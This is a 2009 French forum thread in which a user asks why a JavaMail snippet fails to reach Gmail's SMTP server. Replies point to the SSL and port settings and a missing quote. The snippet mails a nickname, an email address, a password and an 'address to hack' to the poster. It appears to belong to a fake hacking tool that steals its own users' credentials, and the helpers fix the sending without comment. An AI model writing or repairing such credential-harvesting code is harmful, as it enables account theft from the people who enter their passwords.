Partage
  • Partager sur Facebook
  • Partager sur Twitter

Javamail

    1 février 2009 à 19:06:42

    Bonjour,

    voilà j'ai fait un code pour envoyer un mail :

    String from = "aze@gmail.com";
           String to = "azz@gmail.com";
           String subject = "aa;
           String content = "Pseudo: "+pseudo.getText()+"        Adresse : "+email.getText()+
               "     Mot de passe : "+mot.getText()+"      Adresse à pirater"+
                   " : "+emailA.getText();
    
           try {
      
               Properties props = System.getProperties();
      
               props.put("mail.smtp.host", "smtp.gmail.com");
      
               Session session = Session.getDefaultInstance(props, null);
      
               MimeMessage message = new MimeMessage(session);
      
               message.setFrom(new InternetAddress(from));
      
               message.addRecipient(Message.RecipientType.TO, new InternetAddress(to));
      
               message.setSubject(subject);
      
               message.setContent(content, "text/html"); //Envoi en HTML
      
               javax.mail.Transport.send(message);
    }
           catch (Exception e) {
               
               System.err.println("L'envoi du mail a échoué : "+e.getMessage());
           }
       }
    



    mais ça m'envoie cette erreur :

    L'envoi du mail a échoué : Could not connect to SMTP host: smtp.gmail.com, port: 25, response: -1
    • Partager sur Facebook
    • Partager sur Twitter
      1 février 2009 à 19:31:13

      L'erreur est simple: Tu n'arrive pas à te connecté au serveur smtp de gmail.

      Je crois d'ailleurs que gmail utilise un autre port que le port 25.

      EDIT: Je viens de vérifié: Le port 25 marche bien mais :

      Serveur de courrier sortant (SMTP) : 465 ou 25
      Ce serveur nécessite une connexion sécurisée (SSL) activé

      Regarde ici : http://mail.google.com/support/bin/answer.py?answer=76150
      • Partager sur Facebook
      • Partager sur Twitter
        2 février 2009 à 13:15:51

        Que fait-il que je rajoute à mon code pour que cela marche ?
        • Partager sur Facebook
        • Partager sur Twitter
          2 février 2009 à 17:58:35

          que tu change les paramètres de connexion simplement ....
          au passage tu as oublié un ' " '
          dans ton String content
          • Partager sur Facebook
          • Partager sur Twitter

          Javamail

          × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
          × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
          • Editeur
          • Markdown